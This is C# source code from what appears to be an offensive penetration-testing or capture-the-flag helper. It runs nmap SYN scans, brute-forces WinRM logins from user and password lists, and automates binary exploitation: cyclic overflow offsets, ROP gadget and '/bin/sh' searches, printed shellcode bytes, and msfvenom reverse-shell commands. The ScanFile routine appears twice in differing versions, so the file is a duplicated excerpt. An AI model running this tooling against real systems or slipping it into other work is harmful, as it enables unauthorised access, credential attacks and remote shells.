public static string DefaultScan(string[] args, bool mustPing)
{
// ip[0]
// outputfile[1]
if (args.Length < 1)
{
Console.WriteLine("Usage: ip outfile");
Environment.Exit(0);
}
string target = "";
string fileName = "";
if (args.Length == 1)
{
target = args[0];
Console.WriteLine("Outfile name (1 word, no extension)");
fileName = Console.ReadLine();
}
else if (args.Length == 2)
{
target = args[0];
fileName = args[1];
}
// Check if nmap is installed
if (!General.IsInstalledOnLinux("nmap"))
{
Console.WriteLine("Error - nmap is not installed");
Environment.Exit(0);
}
DateTime beforeNmapDate = DateTime.Now;
Console.WriteLine($"Doing an optimized Nmap scan on {target} - This may take awhile...");
string noPing = mustPing ? "" : " -Pn ";
if (General.GetOS() == General.OS.Linux)
{
General.RunProcess($"sudo", $"nmap -sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
}
else
{
General.RunProcess($"nmap", $"-sS -p- {noPing} --min-rate=5000 {target} -oG {fileName}.nmap");
}
DateTime afterNmapDate = DateTime.Now;
TimeSpan nmapScanDuration = afterNmapDate - beforeNmapDate;
Console.WriteLine("Scan complete in " + string.Format("{0:0.00}s", nmapScanDuration.TotalSeconds) + $" - {fileName}.nmap for reecon");
return(fileName);
}
private static void WinRMBrute_Windows(string ip, string userFile, string passFile)
{
List <string> userList = File.ReadAllLines(userFile).ToList();
List <string> passList = File.ReadAllLines(passFile).ToList();
// Perms
List <string> permLines = General.GetProcessOutput("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts " + ip + " -Force");
if (permLines.Count != 0)
{
if (permLines[0].Trim() == "Set-Item : Access is denied.")
{
Console.WriteLine("You need to run Reecon in an Administrative console for this functionality");
return;
}
}
foreach (string user in userList)
{
foreach (string pass in passList)
{
Console.Write("Testing " + user + ":" + pass + " - ");
List <string> processResult = General.GetProcessOutput("powershell", "$creds = New-Object System.Management.Automation.PSCredential -ArgumentList ('" + user + "', (ConvertTo-SecureString \"" + pass + "\" -AsPlainText -Force)); Test-WSMan -ComputerName " + ip + " -Credential $creds -Authentication Negotiate -erroraction SilentlyContinue");
if (processResult.Count != 0)
{
Console.ForegroundColor = ConsoleColor.Green;
Console.WriteLine("Success!");
Console.ForegroundColor = ConsoleColor.White;
}
else
{
Console.ForegroundColor = ConsoleColor.Red;
Console.WriteLine("Failed");
Console.ForegroundColor = ConsoleColor.White;
}
}
}
General.RunProcess("powershell", @"Set-Item WSMan:\localhost\Client\TrustedHosts '' -Force");
}
private static void ScanFile(string fileName)
{
if (!fileName.StartsWith("./"))
{
Console.WriteLine("fileName must start with ./");
return;
}
Architecture architecture = IDElf(fileName);
if (architecture == Architecture.x86)
{
Console.WriteLine("Architecture: x86");
// You can get a segfault address of x86 programs by going
// dmesg | tail -2 (Sometimes the last entry isn't for it)
// dmesg | grep "ret2win32" | tail -1
// pwn cyclic 500
// aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
foreach (string item in dmesgOutput)
{
// segfault at 6161616c ip 000000006161616c x
if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
{
Console.WriteLine("- Cyclic Segfault: " + item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9));
}
}
}
else if (architecture == Architecture.x64)
{
Console.WriteLine("Architecture: x64");
// TODO: Find where it segfaults, -1
}
else
{
Console.WriteLine("Architecture: Unknown - Can only deal with ELFs");
}
if (General.IsInstalledOnLinux("ropper"))
{
List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": ret;", "");
if (pwnItem.Length == 18) // x64
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();;
pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
if (pwnItem.Length == 18)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
if (pwnItem.Length == 10)
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 10 - " + pwnItem.Length);
}
Console.WriteLine("- /bin/sh --> " + pwnItem);
}
}
// // ropper --file sudo_pwn_file_here --string "/bin/sh"
}
else
{
Console.WriteLine("- ropper is not installed - Skipping gadget check and string search");
}
if (General.IsInstalledOnLinux("rabin2"))
{
List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
foreach (string item in rabin2Output)
{
if (item.Trim().StartsWith("nx") && item.Contains("false"))
{
Console.WriteLine("- nx is disabled - You can run your own shellcode!");
if (architecture == Architecture.x64)
{
Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Bug Reelix to fix his code!");
}
}
else if (item.Trim().StartsWith("nx") && item.Contains("true"))
{
Console.WriteLine("- nx is enabled - No custom shellcode for you!");
}
}
}
else
{
Console.WriteLine("- rabin2 is not installed - Skipping nx check");
}
if (General.IsInstalledOnLinux("objdump"))
{
List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Contains("call") && item.Contains("system")) // callq contains call
{
Console.WriteLine("- system --> " + item);
}
if (item.Trim().EndsWith(" <puts@plt>:"))
{
Console.WriteLine("- puts@plt (plt_puts) --> " + item);
}
if (item.Contains("puts@GLIBC"))
{
Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
}
}
objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
foreach (string item in objdumpOutput)
{
// .text = Name
// " g" = Global
if (item.Contains(".text") && item.Contains(" g "))
{
Console.WriteLine("- Useful Symbol: " + item);
}
}
// objdump -t ./file.elf | grep .text
}
else
{
Console.WriteLine("- objdump is not installed - Skipping syscalls");
}
Console.WriteLine("Finished");
}
private static void ScanFile(string fileName)
{
if (!fileName.StartsWith("./"))
{
Console.WriteLine("fileName must start with ./");
return;
}
Architecture architecture = IDFile(fileName);
if (architecture == Architecture.Linux86)
{
Console.WriteLine("Architecture: x86");
// You can get a segfault address of x86 programs by going
// dmesg | tail -2 (Sometimes the last entry isn't for it)
// dmesg | grep "ret2win32" | tail -1
// pwn cyclic 500
// aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae
if (General.IsInstalledOnLinux("pwn"))
{
General.RunProcess("/bin/bash", " -c \"echo 'aaaabaaacaaadaaaeaaafaaagaaahaaaiaaajaaakaaalaaamaaanaaaoaaapaaaqaaaraaasaaataaauaaavaaawaaaxaaayaaazaabbaabcaabdaabeaabfaabgaabhaabiaabjaabkaablaabmaabnaaboaabpaabqaabraabsaabtaabuaabvaabwaabxaabyaabzaacbaaccaacdaaceaacfaacgaachaaciaacjaackaaclaacmaacnaacoaacpaacqaacraacsaactaacuaacvaacwaacxaacyaaczaadbaadcaaddaadeaadfaadgaadhaadiaadjaadkaadlaadmaadnaadoaadpaadqaadraadsaadtaaduaadvaadwaadxaadyaadzaaebaaecaaedaaeeaaefaaegaaehaaeiaaejaaekaaelaaemaaenaaeoaaepaaeqaaeraaesaaetaaeuaaevaaewaaexaaeyaae' | " + fileName + "\"", 5);
List <string> dmesgOutput = General.GetProcessOutput("dmesg", "");
foreach (string item in dmesgOutput)
{
// segfault at 6161616c ip 000000006161616c x
if (item.Contains(fileName.TrimStart("./".ToCharArray())) && item.Contains("segfault at "))
{
// Console.WriteLine("-- Item: " + item);
string segfaultHex = item.Remove(0, item.IndexOf("segfault at ") + 12).Substring(0, 9).Trim();
// Console.WriteLine("-- segfaultHex: " + segfaultHex);
string pwntoolsSearch = (new string(HEX2ASCII(segfaultHex).Reverse().ToArray()));
// Console.WriteLine("-- pwntoolsSearch: " + segfaultHex);
string pwnPos = General.GetProcessOutput("pwn", "cyclic -l " + pwntoolsSearch).First();
Console.WriteLine("- Cyclic Segfault Overflow Position: " + pwnPos);
}
}
}
else
{
Console.WriteLine("- pwntools is not installed - Skipping auto segfault");
}
}
else if (architecture == Architecture.Linux64)
{
Console.WriteLine("Architecture: x64");
// TODO: Find where it segfaults, -1
}
else if (architecture == Architecture.Windows)
{
Console.WriteLine("File Type: Windows (Unknown Architecture)");
}
else
{
Console.WriteLine("Architecture: Unknown - Bug Reelix to fix this!");
}
if (General.IsInstalledOnLinux("ropper"))
{
List <string> ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": ret;", "");
if (pwnItem.Length == 18) // x64
{
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
else if (pwnItem.Length == 10) // x86
{
Console.WriteLine("- ret; (Only function calls) --> " + pwnItem);
}
else
{
Console.WriteLine("Error - Unknown ret length: " + pwnItem.Length);
}
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"pop rdi; ret;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
if (item.Contains(": pop rdi; ret;"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": pop rdi; ret;", "");
if (pwnItem.Length == 18)
{
// TODO: p64 is only for x64 processes - Check first and implement x86 variant
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
Console.WriteLine("- pop rdi; ret; (Can set values) --> " + pwnItem);
}
else
{
Console.WriteLine("Not 18 - " + pwnItem.Length);
}
}
else
{
Console.WriteLine("Unknown prr item: " + item);
}
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --string \"/bin/sh\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]") && item.Contains("/bin/sh"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace("/bin/sh", "").Trim();;
if (pwnItem.Length == 10)
{
// TODO: p64 is only for x64 processes - Check first and implement x86 variant
pwnItem += " -- payload += p64(0x" + pwnItem.Substring(pwnItem.Length - 6, 6) + ")";
// 0x16 - x64 address
}
else
{
Console.WriteLine("Not 10 - " + pwnItem.Length);
}
Console.WriteLine("- /bin/sh --> " + pwnItem);
}
}
ropperOutput = General.GetProcessOutput("ropper", $"--nocolor --file {fileName} --search \"jmp esp;\"");
foreach (string item in ropperOutput)
{
if (!item.StartsWith("[INFO]") && !item.StartsWith("[LOAD]"))
{
if (item.Contains(": jmp esp;"))
{
string pwnItem = item.Trim();
pwnItem = pwnItem.Replace(": jmp esp;", "").Trim();
if (pwnItem.Length == 10 && pwnItem.Substring(0, 2) == "0x")
{
// 0x080414c3 -> 080414c3
string jmpesp = pwnItem.Remove(0, 2);
// 080414c3 -> "\xc3\x14\x04\x08"
jmpesp = string.Format("\\x{0}\\x{1}\\x{2}\\x{3}", jmpesp.Substring(6, 2), jmpesp.Substring(4, 2), jmpesp.Substring(2, 2), jmpesp.Substring(0, 2));
Console.WriteLine("- jmp esp; --> " + pwnItem + " --> " + jmpesp);
}
else
{
Console.WriteLine("Invalud length - Bug Reelix!");
}
}
else
{
Console.WriteLine("Unknown jmp esp Item: " + item);
}
}
}
// // ropper --file sudo_pwn_file_here --string "/bin/sh"
}
else
{
Console.WriteLine("- ropper is not installed (pip install ropper) - Skipping gadget check and string search");
}
if (General.IsInstalledOnLinux("rabin2"))
{
List <string> rabin2Output = General.GetProcessOutput("rabin2", "-I ./" + fileName);
if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("false"))
{
Console.WriteLine("- nx is disabled - You can run your own shellcode!");
if (architecture == Architecture.Linux64) // bits ?
{
Console.WriteLine(@"Linux/x86-64 - Execute /bin/sh: \x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05");
}
else if (architecture == Architecture.Linux86)
{
Console.WriteLine(@"Linux/x86 - Execute /bin/sh: \x31\xc0\x31\xdb\xb0\x06\xcd\x80\x53\x68/tty\x68/dev\x89\xe3\x31\xc9\x66\xb9\x12\x27\xb0\x05\xcd\x80\x31\xc0\x50\x68//sh\x68/bin\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80");
}
else if (architecture == Architecture.Windows)
{
// -f c = Format (Else it just parses raw bytes instead of showing them)
// -b = Bad characters
if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("32"))
{
Console.WriteLine("-- Windows - x86 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x86 --platform windows -f c -b \"\\x00\"");
}
else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("bits")).Contains("64"))
{
Console.WriteLine("-- Windows - x64 Reverse Shell: msfvenom -p windows/shell_reverse_tcp LHOST=ipHere LPORT=portHere -a x64 --platform windows -f c -b \"\\x00\"");
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Unknown Inner Arch - Bug Reelix to fix his code!");
}
}
else
{
// http://shell-storm.org/shellcode/
Console.WriteLine("Unknown Outer Arch - Bug Reelix to fix his code!");
}
}
else if (rabin2Output.FirstOrDefault(x => x.Trim().StartsWith("nx")).Contains("true"))
{
Console.WriteLine("- nx enabled - No custom shellcode for you!");
}
}
else
{
Console.WriteLine("- rabin2 is not installed (sudo apt install radare2 or https://github.com/radareorg/radare2/releases) - Skipping nx check");
}
if (General.IsInstalledOnLinux("objdump"))
{
bool hasMain = false;
List <string> objdumpOutput = General.GetProcessOutput("objdump", $"-D {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Contains("call") && item.Contains("system")) // callq contains call
{
Console.WriteLine("- system --> " + item);
}
if (item.Trim().EndsWith(" <puts@plt>:"))
{
Console.WriteLine("- puts@plt (plt_puts) --> " + item);
}
if (item.Contains("puts@GLIBC"))
{
Console.WriteLine("- puts@GLIBC (got_puts) --> " + item);
}
if (item.Trim().EndsWith(" <main>:"))
{
hasMain = true;
Console.WriteLine("- <main> Address: " + item.Substring(0, item.IndexOf(" ")));
}
}
if (!hasMain)
{
objdumpOutput = General.GetProcessOutput("objdump", $"-f {fileName}");
foreach (string item in objdumpOutput)
{
if (item.Trim().StartsWith("start address "))
{
Console.WriteLine("- " + item);
break;
}
}
}
objdumpOutput = General.GetProcessOutput("objdump", $"-t {fileName}");
foreach (string item in objdumpOutput)
{
// .text = Name
// " g" = Global
if (item.Contains(".text") && item.Contains(" g "))
{
Console.WriteLine("- Useful Symbol: " + item);
}
}
// objdump -t ./file.elf | grep .text
}
else
{
Console.WriteLine("- objdump is not installed - Skipping syscalls");
}
Console.WriteLine("Finished");
}